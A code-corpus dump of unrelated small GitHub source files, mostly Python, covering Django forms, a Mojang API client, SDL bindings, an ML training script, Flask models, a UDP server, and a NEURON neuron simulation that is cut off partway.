is_purchase = forms.BooleanField(
label="Контент доступен для покупки в коллекцию",
help_text='Установите галочку если контент будет доступен для '
'единовременной покупки. Пользователь получит доступ к '
'контенту навсегда, а вы разовую единовременную оплату.'
'Если поле активно, необходимо казать цену для разовой'
' покупки',
required=False,
)
class Meta:
model = Content
fields = ('title', 'description', 'image',
'is_free', 'is_paid_subs', 'is_src_subs', 'is_purchase')
def __init__(self, *args, **kwargs):
"""Переопределение для фильтрации содержимого поля clients"""
self.user = kwargs.pop('user')
super().__init__(*args, **kwargs)
class VideoForm(StyleMixin, forms.ModelForm):
"""Форма описывающая видео"""
url = forms.URLField(
help_text="Ссылка на видео размещенное на видеохостинге YouTube."
"Ссылки на другой видеохостинг работать не будут. ",
widget=forms.TextInput(
attrs={
'placeholder': "https://www.youtube.com/..."},
),
max_length=150,
)
def save(self, commit=True):
"""Переопределение для добавления video_id во время сохранения"""
self.instance = super().save(commit=False)
self.instance.video_id = (
RegExpressions.get_video_id(self.cleaned_data['url']))
self.instance.save()
return self.instance
def clean_url(self):
"""Метод валидации поля платной подписки"""
cleaned_data = self.cleaned_data.get('url')
if cleaned_data:
if 'youtu' not in cleaned_data:
raise forms.ValidationError(
'Допускается использование видео только'
' с хостинга "YouTube"')
return cleaned_data
else:
raise forms.ValidationError(
'Кажется вы забыли указать ссылку на видео')
class Meta:
model = Video
fields = 'url',
| NewterraV/content_selling_platform | content/forms.py | forms.py | py | 13,160 | python | ru | code | 0 | github-code | 36 |
24438494857 | # Some functions for the Mojang API
# import requests
import requests
import datetime
import json
class MinecraftUUIDError(ValueError):
pass
class MinecraftUsernameError(ValueError):
pass
class Player:
# Essential variables
username = None
uuid = None
alias = None
# Vars to be used in called methods
names = None
def __init__(self, id, alias=None):
self.alias = alias
if len(id) > 16:
# It is a uuid, get the username as well
self.uuid = id
try:
self.username = get_player_from_uuid(id)['name']
except MinecraftUUIDError as err:
raise err
else:
# It is a username, get the uuid
self.username = id
try:
req = get_uuid_from_player(id)
self.uuid = req[0]['id']
self.username = req[0]['name']
except IndexError:
raise MinecraftUsernameError(f'{id} is not a valid username')
def name_history(self):
if self.names is None:
req_url = f'https://api.mojang.com/user/profiles/{self.uuid}/names'
req = requests.get(req_url)
res = req.json()
self.names = [(res[0]['name'], None)]
for name in res[1:]:
self.names.append((name['name'], name['changedToAt'] // 1000))
return self.names
def __str__(self):
return f'{self.username} {self.uuid}'
def get_uuid_from_player(names):
# If names is just a string of one name, convert it to a list
if type(names) == ''.__class__:
names = [names]
url = 'https://api.mojang.com/profiles/minecraft'
req = requests.post(url, json=names)
return req.json()
def get_player_from_uuid(uuid):
# Gets the player data for a uuid
url = f'https://sessionserver.mojang.com/session/minecraft/profile/{uuid}'
req = requests.get(url)
try:
return req.json()
except json.decoder.JSONDecodeError:
raise MinecraftUUIDError(f'{uuid} is not a valid UUID')
if __name__ == '__main__':
player = Player('8')
names = player.name_history()
for name in names:
try:
print(f'Switched to {name[0]} {datetime.datetime.fromtimestamp(name[1])}')
except TypeError as err:
print(f'Original name: {name[0]}')
| joshuaSmith2021/chamosbot-gassistant | mojang.py | mojang.py | py | 2,392 | python | en | code | 0 | github-code | 36 |
22076774319 | # -*- coding: utf-8 -*-
"""
Created on Wed Jan 4 18:18:30 2023
@author: Pervin
"""
#mini uygulama
#if, for ve fonksiyonlari birlikte kullanmak
maaslar = [1000,2000,3000,4000,5000]
def maas_ust(x):
print(x*10/100 + x)
def maas_alt(x):
print(x*20/100 + x)
for i in maaslar:
if i >= 3000:
maas_ust(i)
else:
maas_alt(i) | pervincaliskan/Python | function_loops_example.py | function_loops_example.py | py | 366 | python | en | code | 1 | github-code | 36 |
74173801063 | from ctypes import CDLL, c_char_p, c_void_p, c_int, Structure, byref, c_byte
class SDL_Event(Structure):
_fields_ = [
('type', c_byte),
('padding', c_int * 1024),
]
class SDL(object):
SDL_INIT_AUDIO = 0x00000010
SDL_INIT_VIDEO = 0x00000020
SDL_OPENGL = 0x00000002
def __init__(self, width, height):
self.width = width
self.height = height
self.libSDL = CDLL('SDL')
self.SDL_Init = self.libSDL.SDL_Init
self.SDL_Init.argtypes = [c_int]
self.SDL_SetVideoMode = self.libSDL.SDL_SetVideoMode
self.SDL_SetVideoMode.argtypes = [c_int, c_int, c_int, c_int]
self.SDL_PollEvent = self.libSDL.SDL_PollEvent
self.SDL_PollEvent.argtypes = [c_void_p]
self.SDL_PollEvent.restype = c_int
self.SDL_Quit = self.libSDL.SDL_Quit
self.SDL_GetError = self.libSDL.SDL_GetError
self.SDL_GetError.restype = c_char_p
self.SDL_GL_SwapBuffers = self.libSDL.SDL_GL_SwapBuffers
if self.SDL_Init(self.SDL_INIT_VIDEO | self.SDL_INIT_AUDIO) == -1:
raise RuntimeError(SDL_GetError().decode('utf-8'))
if self.width != 0 and self.height != 0:
self.SDL_SetVideoMode(width, height, 0, self.SDL_OPENGL)
def update(self):
event = SDL_Event()
while self.SDL_PollEvent(byref(event)):
if event.type == 12: # SDL_QUIT
raise RuntimeError('Quit')
if self.width != 0 and self.height != 0:
self.SDL_GL_SwapBuffers()
def __del__(self):
try:
self.SDL_Quit()
except:
...
| supersmo/parley-who-vertigo | python/external/sdl.py | sdl.py | py | 1,644 | python | en | code | 1 | github-code | 36 |
20093789712 | # 序列:字符串 元祖 列表
# 成员操作符 🔗操作符 重复操作符 切片操作符
zodiac_name = ('猴鸡狗猪属牛虎兔龙蛇马羊')
constellation_name = (u'摩羯座', u'水瓶座', u'双鱼座', u'白羊座', u'金牛座', u'双子座',
u'巨蟹座', u'狮子座', u'处女座', u'天秤座', u'天蝎座', u'射手座')
# 元祖 不可变更
constellation_days = ((1, 20), (2, 19), (3, 21), (4, 21), (5, 21), (6, 22),
(7, 23), (8, 23), (9, 23), (10, 23), (11, 23), (12, 23))
# 元祖比较 元祖嵌套
# 列表 可变更
# filter lambda
# list函数
# len函数
(month, day) = (6, 26)
constellation_day = filter(lambda x: x <= (month, day), constellation_days)
constellation_len = len(list(constellation_day)) % 12
print(constellation_len)
print(constellation_name[constellation_len])
year = int(input('输入年份:'))
size = year % 12
print(zodiac_name[size])
# 列表操作
a_list = ['a', 'ab']
a_list.append('xyz')
print(a_list)
a_list.remove('a')
print(a_list)
# 字典
zodiac_num = {}
zodiac_num = {i: 0 for i in zodiac_name}
# for i in zodiac_name:
# # 更优雅地赋值
# zodiac_num[i] = 0
constellation_num = {}
constellation_num = {i: 0 for i in constellation_name}
# for i in constellation_name:
# constellation_num[i] = 0
while True:
year = int(input('输入年份:'))
month = int(input('输入月份:'))
day = int(input('输入日期:'))
n = 0
while constellation_days[n] < (month, day):
if month == 12 and day > 23:
break
n = n + 1
# print(constellation_name[n])
zodiac_num[zodiac_name[year % 12]] += 1
constellation_num[constellation_name[n]] += 1
for each_key in zodiac_num.keys():
print('生肖 %s 有 %d 个' % (each_key, zodiac_num[each_key]))
for each_key in constellation_num.keys():
print('星座 %s 有 %d 个' % (each_key, constellation_num[each_key]))
| mario2100/Spring_All | try/py_try/1_zodiac_constellation.py | 1_zodiac_constellation.py | py | 1,963 | python | en | code | 0 | github-code | 36 |
30079500269 | import QRTicketing
import cv2
def Decode(str):
a='ABCDEFGHIJKLMNOPQRSTUVWXYZ'
cipherstr=''
for i in str:
k=a.index(i)
cipherstr+=a[((k - 5)%26)]
return str
cap = cv2.VideoCapture(0)
detector = cv2.QRCodeDetector()
while True:
_, img = cap.read()
data, bbox, _ = detector.detectAndDecode(img)
if data:
a=data
break
cv2.imshow("image", img)
if cv2.waitKey(1) == ord("q"):
break
if(QRTicketing.main.verifyQR(a)):
QRTicketing.db_update([Decode(a[:"_"]),a["_"+1:]])
print("ValidQr")
else:
print("Invalid QR") | PreethiPreetz-30/Ticketless-Entry---QR | ScanTicket.py | ScanTicket.py | py | 593 | python | en | code | 0 | github-code | 36 |
7753689154 | total_notas = int(input("Ingrese la cantidad total de notas: "))
suma_notas = 0.0
# Solicitar las notas individuales y sumarlas
for i in range(total_notas):
nota = float(input("Ingrese la nota {}: ".format(i+1)))
suma_notas += nota
# Calcular el promedio
promedio = suma_notas / total_notas
# Mostrar el resultado
if promedio >= 3.0:
print("Aprobó")
else:
print("No aprobó")
| rubenalvarez98/Recuperalo | condicionales/condicionales5.py | condicionales5.py | py | 414 | python | es | code | 0 | github-code | 36 |
33008617060 | """ Python Class and Object """
class Parrot:
# class attribute
name = ""
age = 0
# create parrot1 object
parrot1 = Parrot()
parrot1.name = "Blu"
parrot1.age = 10
# create another object parrot2
parrot2 = Parrot()
parrot2.name = "Woo"
parrot2.age = 15
# access attributes
print(f"{parrot1.name} is {parrot1.age} years old")
print(f"{parrot2.name} is {parrot2.age} years old")
"""
Output:
Blu is 10 years old
Woo is 15 years old
"""
print()
""" Python Inheritance """
# base class
class Animal:
def eat(self):
print("I can eat!")
def sleep(self):
print("I can sleep!")
# derived class
class Dog(Animal):
def bark(self):
print("I can bark! Woof woof!!")
# create object of Dog class
dog1 = Dog()
# calling members of base class
dog1.eat()
dog1.sleep()
# calling members of derived class
dog1.bark()
"""
Output:
I can eat!
I can sleep!
I can bark! Woof woof!!
"""
print()
""" Python Encapsulation """
class Computer:
def __init__(self):
self.__maxprice = 900
def sell(self):
print("Selling Price: {}".format(self.__maxprice))
def setMaxPrice(self, price):
self.__maxprice = price
c = Computer()
c.sell()
# change the price
c.__maxprice = 1000
c.sell()
# using setter function
c.setMaxPrice(1000)
c.sell()
"""
Output:
Selling Price: 900
Selling Price: 900
Selling Price: 1000
"""
print()
""" Polymorphism """
class Polygon:
# method to render a shape
def render(self):
print("Rendering Polygon...")
class Square:
# renders square
def render(self):
print("Rendering Square...")
class Circle:
# renders circle
def render(self):
print("Rendering Circle...")
# create an object of Sqaure
s1 = Square()
s1.render()
# create an object of Circle
c1 = Circle()
c1.render()
"""
Output:
Rendering Square...
Rendering Circle...
"""
| Saiteja151/PYTHON_REPOS | Python/OOPS/OOPS/oops.py | oops.py | py | 1,971 | python | en | code | 0 | github-code | 36 |
15870462971 | import os
import sys
import time
import torch
import torch.nn.functional as F
from sklearn.metrics import mean_squared_error
from graphrepr.evaluate import test_model
from graphrepr.savingutils import save_configs, save_history, LoggerWrapper
from graphrepr.config import parse_model_config, parse_representation_config, parse_data_config
from graphrepr.config import utils_section, data_section, params_section, optimizer_section
from graphrepr.chemprop.args import ModelArgs
from graphrepr.chemprop.model import MoleculeModel
from graphrepr.chemprop.features import set_representation
from graphrepr.main_dmpnn_utils import load_data_chemprop, run_epoch, predict
# run: python main.py simple_nn.cfg esol.cfg simple_repr.cfg /home/abc/results
n_args = 1 + 4 # namefile, architecture_config, data_config, representation_config, main_saving_directory
NUM_WORKERS = 2
if __name__ == '__main__':
if len(sys.argv) != n_args:
print(f"Usage: {sys.argv[0]} architecture.cfg data.cfg representation.cfg main_saving_directory")
quit(1)
# set global saving subdir for this experiment and create it
# name of the experiment subdir is derived from the names of the configs
# config name should be: {unique_key}_{whatever}.{ext} ex. 2_best_model.cfg
basename = lambda x: os.path.basename(x).split('.')[0].split('_')[0]
dname = "_".join([basename(x) for x in [sys.argv[1], sys.argv[2], sys.argv[3]]])
saving_dir = os.path.join(sys.argv[4], dname)
try:
os.makedirs(saving_dir)
except FileExistsError:
pass
# setup logger (everything that goes through logger or stderr will be saved in a file and sent to stdout)
logger_wrapper = LoggerWrapper(saving_dir)
sys.stderr.write = logger_wrapper.log_errors
logger_wrapper.logger.info(f'Running {[basename(x) for x in [sys.argv[1], sys.argv[2], sys.argv[3]]]}')
# device selection
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
# Load configs
model_config = parse_model_config(sys.argv[1])
data_config = parse_data_config(sys.argv[2])
representation_config = parse_representation_config(sys.argv[3])
save_configs(sys.argv[1], sys.argv[2], sys.argv[3], saving_dir)
################
# # # DATA # # #
################
set_representation(**representation_config[utils_section])
# define train and validation data splits
if data_config[utils_section]['cv']:
trains = []
vals = []
for val_fold in data_config[data_section].values():
trains.append([fold for fold in data_config[data_section].values() if fold != val_fold])
vals.append([val_fold, ])
splits = list(zip(trains, vals))
else:
trains = [[data_config[data_section][key],] for key in data_config[data_section] if 'train' in key.lower()]
vals = [[data_config[data_section][key],] for key in data_config[data_section] if 'valid' in key.lower()]
splits = list(zip(trains, vals))
# load test
test_smiles, test_labels, test_loader = load_data_chemprop([data_config[utils_section]["test"], ],
data_config, model_config,
shuffle=False, num_workers=NUM_WORKERS)
#####################
# # # MAIN LOOP # # #
#####################
for fold_idx, (train_paths, validation_path) in enumerate(splits):
logger_wrapper.logger.info(f'Running fold {fold_idx+1}/{len(splits)}')
# subdirectory for this fold, file names
fold_subdirectory = os.path.join(saving_dir, f"fold{fold_idx+1}")
try:
os.makedirs(fold_subdirectory)
except FileExistsError:
pass
timestamp = time.strftime('%Y-%m-%d-%H-%M')
best_model_path = os.path.join(fold_subdirectory, f"{timestamp}-best_model_weights.pt")
# loading train and validation datasets
train_dataset, train_smiles, train_loader = load_data_chemprop(train_paths,
data_config, model_config,
shuffle=True, num_workers=NUM_WORKERS)
valid_dataset, valid_smiles, valid_loader = load_data_chemprop(validation_path,
data_config, model_config,
shuffle=False, num_workers=NUM_WORKERS)
# defining model, optimizer, scheduler, and the loss function
if "mse" == data_config[utils_section]['cost_function'].lower().strip():
loss_function = F.mse_loss
loss_function_valid = mean_squared_error # workaround cause we have np.arrays not torch.Tensors // FIXME?
loss_function_model_args = 'mse'
else:
raise NotImplementedError("Unknown loss function; only MSE is currently implemented")
modelArgs = ModelArgs(**model_config[params_section], device=device, loss_function=loss_function_model_args)
model = MoleculeModel(modelArgs).to(device)
logger_wrapper.logger.info(model)
logger_wrapper.logger.info(f"Number of conv layers: {model.encoder.encoder[0].depth}")
if "adam" == model_config[optimizer_section]['optimizer'].lower().strip():
optimizer = torch.optim.Adam(model.parameters(), lr=model_config[optimizer_section]['lr'])
else:
raise NotImplementedError("Unknown optimizer; only Adam is currently implemented")
scheduler = None # for easy checkup later
if model_config[optimizer_section]['scheduler'] > 0:
assert 0 < model_config[optimizer_section]['scheduler'] < 1, "scheduler value must be -1 (no scheduler) or between 0 and 1"
step_size = int(model_config[optimizer_section]['scheduler'] * model_config[optimizer_section]["n_epochs"])
scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=step_size, gamma=0.1) # divide lr by ten after every step_size epochs
# actual training
train_loss = []
valid_loss = []
min_valid_loss = sys.maxsize
for epoch in range(model_config[optimizer_section]["n_epochs"]):
# train
cumulative_epoch_train_loss = run_epoch(model, loss_function, optimizer, train_loader, device)
# validate
true_ys, pred_ys = predict(model, valid_loader, device)
# scheduler
if scheduler is not None:
scheduler.step()
# remember stuff
epoch_valid_loss = loss_function_valid(pred_ys, true_ys)
train_loss.append(cumulative_epoch_train_loss / len(train_dataset))
valid_loss.append(epoch_valid_loss)
logger_wrapper.logger.info(f'Epoch: {epoch}, train loss: {train_loss[-1]}, valid loss: {epoch_valid_loss}')
if epoch_valid_loss < min_valid_loss:
logger_wrapper.logger.info("Saving model")
torch.save(model.state_dict(), best_model_path)
min_valid_loss = epoch_valid_loss
save_history(train_loss, valid_loss, fold_subdirectory)
# testing on the test set
# load the best version of the model, then repack data and run the test function
model.load_state_dict(torch.load(best_model_path))
model.eval() # set dropout and batch normalization layers to evaluation mode before running inference
# train gets new loader without shuffling so the order of smiles is OK # FIXME this is not ideal
train_dataset, train_smiles, train_loader = load_data_chemprop(train_paths,
data_config, model_config,
shuffle=False, num_workers=NUM_WORKERS)
data = ((train_loader, train_smiles), (valid_loader, valid_smiles), (test_loader, test_smiles))
test_model(model, data, device, fold_subdirectory,
calculate_parity=data_config[utils_section]["calculate_parity"],
calculate_rocauc=data_config[utils_section]["calculate_rocauc"],
predict_func=predict)
| gmum/graph-representations | scripts/main_dmpnn.py | main_dmpnn.py | py | 8,394 | python | en | code | 18 | github-code | 36 |
74837131945 | import unittest
from unittest.mock import Mock
from BookService import BookService
class TestBookService(unittest.TestCase):
def setUp(self) -> None:
self.book_repository = Mock()
self.author = "Лев Толстой"
self.list_books = [Mock(title="Анна Каренина"), Mock(title="Детство")]
def test_find_books_by_author(self):
self.book_repository.find_books_by_author.return_value = self.list_books
book_service = BookService(self.book_repository)
sort_books = book_service.find_books_by_author(self.author)
self.assertEqual(self.list_books, sort_books)
def test_find_book_by_id(self):
book_repository = Mock()
book_id = 1
expected_book = Mock(title="Азбука")
book_repository.find_book_by_id.return_value = expected_book
book_service = BookService(book_repository)
book = book_service.find_book_by_id(book_id)
self.assertEqual(expected_book, book)
| vit21513/unit_test | homework/hw_4/test_bookService.py | test_bookService.py | py | 1,002 | python | en | code | 0 | github-code | 36 |
8838127682 | """Models for Blogly."""
from flask_sqlalchemy import SQLAlchemy
import datetime
db = SQLAlchemy()
DEFAULT_IMAGE_URL = "https://cdn2.iconfinder.com/data/icons/avatars-99/62/avatar-370-456322-512.png"
def connect_db(app):
"""Connect to database."""
db.app = app
db.init_app(app)
class User(db.Model):
"""User class"""
__tablename__ = "users"
id = db.Column(db.Integer, primary_key = True, autoincrement = True)
first_name = db.Column(db.String(50), nullable = False)
last_name = db.Column(db.String(50), nullable = True)
image_url = db.Column(db.String, default = DEFAULT_IMAGE_URL)
posts = db.relationship("Post", backref="user", cascade="all, delete-orphan")
def __repr__(self):
return f"<User {self.first_name} {self.last_name} {self.image_url} >"
def get_full_name(self):
"""Get users full name."""
if self.last_name == None:
return self.first_name
else:
return f"{self.first_name} {self.last_name}"
class Post(db.Model):
"""Post class"""
__tablename__ = "posts"
id = db.Column(db.Integer, primary_key = True, autoincrement = True)
title = db.Column(db.String(50), nullable = False)
content = db.Column(db.String, nullable = True)
created_at = db.Column(db.DateTime, nullable = False, default=datetime.datetime.now)
user_id = db.Column(db.Integer, db.ForeignKey('users.id'), nullable = False)
# posts_n_tags = db.relationship('PostTag', backref = 'post')
def __repr__(self):
return f"<Post {self.title} {self.content} {self.created_at} {self.user_id} >"
def friendly_date(self):
"""Show date in a user friendly format"""
return self.created_at.strftime("%a %b %-d %Y, %-I:%M %p")
class Tag(db.Model):
"""Tag class."""
__tablename__ = "tags"
id = db.Column(db.Integer, primary_key = True, autoincrement = True)
name = db.Column(db.String(50), nullable = False, unique = True)
# tags_n_posts = db.relationship('PostTag', backref = 'tag')
posts = db.relationship(
'Post',
secondary = 'posts_tags',
backref = "tags",
cascade="all, delete")
def __repr__(self):
return f"<Tag {self.id} {self.name}>"
class PostTag(db.Model):
"""PostTag class."""
__tablename__ = "posts_tags"
post_id = db.Column(db.Integer, db.ForeignKey("posts.id"), primary_key = True)
tag_id = db.Column(db.Integer, db.ForeignKey("tags.id"), primary_key = True)
def __repr__(self):
return f"<PostTag {self.post_id} {self.tag_id}>" | kabdrau/Blogly-application | models.py | models.py | py | 2,622 | python | en | code | 0 | github-code | 36 |
31065164595 |
from ..utils import Object
class UpdateMessageEdited(Object):
"""
A message was edited. Changes in the message content will come in a separate updateMessageContent
Attributes:
ID (:obj:`str`): ``UpdateMessageEdited``
Args:
chat_id (:obj:`int`):
Chat identifier
message_id (:obj:`int`):
Message identifier
edit_date (:obj:`int`):
Point in time (Unix timestamp) when the message was edited
reply_markup (:class:`telegram.api.types.ReplyMarkup`):
New message reply markup; may be null
Returns:
Update
Raises:
:class:`telegram.Error`
"""
ID = "updateMessageEdited"
def __init__(self, chat_id, message_id, edit_date, reply_markup, **kwargs):
self.chat_id = chat_id # int
self.message_id = message_id # int
self.edit_date = edit_date # int
self.reply_markup = reply_markup # ReplyMarkup
@staticmethod
def read(q: dict, *args) -> "UpdateMessageEdited":
chat_id = q.get('chat_id')
message_id = q.get('message_id')
edit_date = q.get('edit_date')
reply_markup = Object.read(q.get('reply_markup'))
return UpdateMessageEdited(chat_id, message_id, edit_date, reply_markup)
| iTeam-co/pytglib | pytglib/api/types/update_message_edited.py | update_message_edited.py | py | 1,307 | python | en | code | 20 | github-code | 36 |
11576039211 | from socket import *
from datetime import datetime
serverPort = 8080
serverSocket = socket(AF_INET, SOCK_DGRAM)
#atribui a porta ao socket criado
serverSocket.bind(('', serverPort))
print("The server is ready to receive")
while True:
#recebe a mensagem do cliente em bytes
message, clientAddress = serverSocket.recvfrom(2048)
print("mensagem recebida: ", message)
now = datetime.now()
msg = message.decode()
msg.upper()
msg = str(msg) + ' : ' + str(now)
message = str.encode(msg)
#envio tbm deve ser em bytes
serverSocket.sendto(message, clientAddress) | srpantoja/Redes_trabalhos | python/UDPServer.py | UDPServer.py | py | 593 | python | pt | code | 0 | github-code | 36 |
10638103617 | # -*- coding: utf-8 -*-
"""
Created on Wed Sep 14 23:01:14 2016
@author: Neo
parameter fitting, using Oort-Lindblad equation:
k*u_l^* = (S1*sin(l) - S2*cos(l)/r + B*cos(b) + A*cos(2l)*cos(b)
"""
import numpy as np
sin = np.sin
cos = np.cos
k = 4.7407
def ParFit(pmlon, err, l, b, r):
'''
pmls = pml*cos(b), mas/yr
r: kpc
'''
parS1 = sin(l)/r
parS2 = -cos(l)/r
parA = cos(2*l)*cos(b)
parB = cos(b)
wgt = np.diag(err**-2)
FT = np.vstack((parS1, parS2, parA, parB))
F = np.transpose(FT)
## a*x = y
a = np.dot(np.dot(FT, wgt), F)
y = np.dot(np.dot(FT, wgt), k*np.transpose(pmlon))
x = np.linalg.solve(a, y)
cov = np.linalg.inv(a)
sig = np.sqrt(cov.diagonal())
corrcoef = np.array([ cov[i,j]/sig[i]/sig[j] \
for j in range(len(x)) for i in range(len(x))])
corrcoef.resize((len(x), len(x)))
return x, sig, corrcoef
#def Elim(pmRAs,pmDEs, e_pmRA,e_pmDE, n):
# a = np.abs(pmRAs) - n*e_pmRA
# b = np.abs(pmDEs) - n*e_pmDE
# indice1 = np.where(a<0)
# indice2 = np.where(b<0)
# indice = np.intersect1d(indice1, indice2)
## pmRA = np.take(pmRA, indice)
## pmDE = np.take(pmDE, indice)
## e_pmRA = np.take(e_pmRA, indice)
## e_pmDE = np.take(e_pmDE, indice)
## RA = np.take(RA, indice)
## DE = np.take(DE, indice)
#
# return indice
#
#def loop(pmRA,pmDE,e_pmRA,e_pmDE,RA,DE, flog):
# w, sig, corrcoef = RotationFit(pmRA,pmDE,e_pmRA,e_pmDE,RA,DE)
#
# print>>flog, 'the orientation/spin are(mas/mas*yr-1):\n ',w
# print>>flog, ' sigma are(mas/mas*yr-1):\n', sig
# print>>flog, ' correlation coefficients are:\n', corrcoef
### Calculate the residuals
# wx = w[0]
# wy = w[1]
# wz = w[2]
#
# pmRAf = -sin(DE)*cos(RA)*wx-sin(DE)*sin(RA)*wy+cos(DE)*wz
# pmDEf = sin(RA)*wx-cos(RA)*wy
#
### residuals
# pmRAs = pmRAf - pmRA
# pmDEs = pmDEf - pmDE
#
### generate the new array after eliminating outliers
# n = 2.6
# indice = Elim(pmRAs,pmDEs, e_pmRA,e_pmDE, n)
# npmRA = np.take(pmRA, indice)
# npmDE = np.take(pmDE, indice)
# ne_pmRA = np.take(e_pmRA, indice)
# ne_pmDE = np.take(e_pmDE, indice)
# nRA = np.take(RA, indice)
# nDE = np.take(DE, indice)
#
# print>>flog, 'Eliminating(%2.1f-sigma): %d Outliers.'%(n,len(pmRA)-len(npmRA))
#
# w, sig, corrcoef = RotationFit(npmRA,npmDE,ne_pmRA,ne_pmDE,nRA,nDE)
### Calculate the residuals again
# wx = w[0]
# wy = w[1]
# wz = w[2]
#
# npmRAf = -sin(nDE)*cos(nRA)*wx-sin(nDE)*sin(nRA)*wy+cos(nDE)*wz
# npmDEf = sin(nRA)*wx-cos(nRA)*wy
#
### residuals
# npmRAs = npmRAf - npmRA
# npmDEs = npmDEf - npmDE
#
## res = np.hstack((npmRAs/ne_pmRA**2, npmDEs/ne_pmDE**2))
# wrmsRA = np.sqrt(np.sum(npmRAs**2/ne_pmRA**2)/np.sum(ne_pmRA**-2))
# wrmsDE = np.sqrt(np.sum(npmDEs**2/ne_pmDE**2)/np.sum(ne_pmDE**-2))
#
# print>>flog, 'After eliminating outliers, the orientation/spin are(mas/mas*yr-1):\n ',w
# print>>flog, ' sigma are(mas/mas*yr-1):\n', sig
# print>>flog, ' correlation coefficients are:\n', corrcoef
# print>>flog, ' w.r.m.s(mas/mas*yr-1) is:\n', wrmsRA, wrmsDE
#
# return w, sig, corrcoef, wrmsRA, wrmsDE
#
#def SpinFit(pmRA,pmDE,e_pmRA,e_pmDE,RA,DE, flog):
#### First Loop, calculate the mean error without weights.
# np.ones(len(pmRA))
# print>>flog, 'First, no weight apply to the data. Calculate the w.r.m.s'
# w, sig, corrcoef, wrmsRA, wrmsDE = loop(pmRA,pmDE,np.ones(len(pmRA)),np.ones(len(pmDE)),RA,DE, flog)
# merrRA, merrDE = wrmsRA, wrmsDE
#
### Next, apply the weigths of M_err**2/err_i**2
# print>>flog, 'Next, apply the weigths of M_err**2/err_i**2'
# w, sig, corrcoef, wrmsRA, wrmsDE = loop(pmRA,pmDE,e_pmRA/merrRA,e_pmDE/merrDE,RA,DE, flog)
###############################################################################
## Main function | Niu-Liu/thesis-materials | gaia-crf1/OLeqnFit.py | OLeqnFit.py | py | 3,982 | python | en | code | 0 | github-code | 36 |
22108118261 | #!/usr/bin/env python
# coding: utf-8
# Loading the libraries
import requests
from bs4 import BeautifulSoup
import time
import random
from tqdm.notebook import tqdm as tqdm
# Part a
page_url = "https://www.barnesandnoble.com/b/books/_/N-1fZ29Z8q8?Nrpp=40&page=1"
headers = {"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"}
search_page = requests.get(page_url, headers=headers)
page_info = BeautifulSoup(search_page.content, "html.parser")
# Part b
url_prefix = "https://www.barnesandnoble.com"
list_product_header = page_info.find_all("h3", class_ = "product-info-title")
list_product_urls = []
product_dict = dict()
for i, product in enumerate(list_product_header):
product_url = url_prefix + product.find("a")['href']
list_product_urls = list_product_urls + [product_url]
product_name = product.find("a").text
product_dict[i+1] = product_name
# Part c
base_fname = "top100_bn_"
for i, product_url in enumerate(list_product_urls):
product_search = requests.get(product_url, headers=headers)
fname = f"{base_fname}_{i+1}.html"
with open(fname,"a+") as f:
f.write(str(product_search.content))
f.close()
# Adding sleep time
sleep_time = random.randint(5,10)
time.sleep(sleep_time)
# Part d
prod_count = len(list_product_header)
for i in range(prod_count):
fname = f"{base_fname}_{i+1}.html"
with open(fname, "r") as f:
page_content = BeautifulSoup(f, "html.parser")
f.close()
overview_box = page_content.find("div", class_ = "content overview-expandable-section")
overview_content = overview_box.find("div", class_ = "overview-cntnt")
print(f"Overview content for '{product_dict[i+1]}'")
print(overview_content.text[:100])
print("") | jeetp465/Web-Scraping | Barnes and Noble Scraping.py | Barnes and Noble Scraping.py | py | 1,841 | python | en | code | 0 | github-code | 36 |
1252647732 | class MiddleoftheLinkedList(object):
def middleNode(self, head):
A = [head]
while A[-1].next:
A.append(A[-1].next)
return A[len(A) // 2]
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
if __name__ == '__main__':
a = MiddleoftheLinkedList()
h1 = ListNode(1)
h2 = ListNode(2)
h3 = ListNode(3)
h4 = ListNode(4)
h5 = ListNode(5)
h6 = ListNode(6)
h1.next = h2
h2.next = h3
h3.next = h4
h4.next = h5
h5.next = h6
print(a.middleNode(h1).val)
print(a.middleNode(h2).val)
print(a.middleNode(h3).val)
print(a.middleNode(h4).val)
| lyk4411/untitled | beginPython/leetcode/MiddleoftheLinkedList.py | MiddleoftheLinkedList.py | py | 669 | python | en | code | 0 | github-code | 36 |
40935361016 | list = []
dataIn = None
def printLowHigh(list):
high = list[0]
low = list[0]
for i in range(len(list)):
if i < low:
low = list[i]
if i > high:
high = list[i]
print (low, high)
def Promedio(list):
suma = 0
for i in range(len(list)):
suma = suma + list[i]
promedio = suma / len(list)
return promedio
while True:
dataIn=int(input("ingrese el valor "))
if dataIn == -1:
break
list.append(int(dataIn))
printLowHigh(list)
print (Promedio(list))
| carlitomm/python_prog_course | 1ejercicios_clases/eje8.py | eje8.py | py | 544 | python | en | code | 0 | github-code | 36 |
2457622473 |
# This Python code reproduces the upper and low panel of Fig. 6 in Clay et. al. (2008).
#Save the voltage nd time series csv files as v1.csv for the standard HH model (top panel of fig.6 and v2.csv for the revised model (bottom panel for of fig. 6)
from neuron import h
import numpy as np
import matplotlib.pyplot as plt
import timeit
import subprocess
import math
def initialize():
h.finitialize()
h.fcurrent()
def integrate():
#g.begin()
h.finitialize()
while h.t<tstop:
h.fadvance()
cell=h.Section()
nseg=9
cell.nseg=nseg # number of segments
cell.Ra=35.4 # ohm*cm # cable resistance
cell.cm=1
l=1# length of the axon in mm
cell.L=l*1000 # length of the axon in um to be read into NEURON
cell.diam=500 # diameter of the axon in um
#insert the mechanism
#cell.insert('kext_clay') #in case the potassium accumulation is used.
cell.insert('hh') #inserting Clay revised HH model
#cell.insert('hh') # Standard Hodgkin Huxley model
cell.ek = -72
cell.ena = 55
#Stimulation current
stim1=h.IClamp(0,sec=cell)
stim1.delay=100 #ms
stim1.dur=80 #ms
stim1.amp= 250 #nA
#print stim_density * 1000 * area
vec={}
for var in 'i','t','v':
vec[var]=h.Vector()
vec['t'].record(h._ref_t)
vec['v'].record(cell(0.99)._ref_v)
vec['i'].record(stim1._ref_i)
tstop=200
h.dt=0.01
initialize()
integrate()
np.savetxt('v1.csv', vec['v'], delimiter= ',')
np.savetxt('time.csv', vec['t'], delimiter= ',') # saving the time series
cell2=h.Section()
nseg=9
cell2.nseg=nseg # number of segments
cell2.Ra=35.4 # ohm*cm # cable resistance
cell2.cm=1
l=1# length of the axon in mm
cell2.L=l*1000 # length of the axon in um to be read into NEURON
cell2.diam=500 # diameter of the axon in um
